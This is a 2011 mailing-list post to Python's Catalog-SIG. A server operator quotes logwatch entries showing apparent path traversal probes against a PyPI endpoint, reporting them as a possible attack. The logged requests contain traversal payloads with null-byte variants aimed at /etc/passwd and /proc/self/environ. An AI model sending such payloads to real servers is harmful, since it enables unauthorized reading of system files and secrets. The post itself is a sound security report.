[Catalog-sig] Attempts to hack pypi?

Fri, 02 Dec 2011 11:43:12 -0800 

Hi All,

I got these from a logwatch warning on my server:
/pypi?:action=/../../../../../../../../../../etc/passwd%00&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 302 /pypi?%3Aaction=../../../../../../../../../../etc/passwd HTTP Response 302 /pypi?%3Aaction=../../../../../../../../../../proc/self/environ HTTP Response 302 /pypi?%3Aaction=../../../../../../../../../../etc/passwd%00 HTTP Response 302
/pypi?:action=../../../../../../../../../../proc/self/environ&provider=myOpenID HTTP Response 302
/pypi?:action=show_md5&digest=/../../../../../../../../../../proc/self/environ%00 HTTP Response 302
/pypi?:action=show_md5&digest=../../../../../../../../../../proc/self/environ HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd%00&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 302 /pypi?%3Aaction=/../../../../../../../../../../etc/passwd%00 HTTP Response 302
/pypi?:action=../../../../../../../../../../proc/self/environ&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd&provider=myOpenID HTTP Response 302
/pypi?:action=/../../../../../../../../../../etc/passwd&provider=myOpenID HTTP Response 302 /pypi?%3Aaction=/../../../../../../../../../../proc/self/environ%00 HTTP Response 302 /pypi?%3Aaction=/../../../../../../../../../../etc/passwd HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 302
/pypi?:action=/../../../../../../../../../../etc/passwd&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 302 
    /pypi?:action=show_md5&digest=/etc/passwd HTTP Response 302
/pypi?:action=/../../../../../../../../../../proc/self/environ%00&provider=myOpenID HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd%00&provider=myOpenID HTTP Response 302 
    /pypi?%3Aaction=/etc/passwd HTTP Response 302
/pypi?:action=/../../../../../../../../../../proc/self/environ%00&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 302
...which looks a lot like someone trying to hack information from the PyPI server, so thought I'd let you know... 

cheers,

Chris
_______________________________________________
Catalog-SIG mailing list
[email protected]
http://mail.python.org/mailman/listinfo/catalog-sig

Reply via email to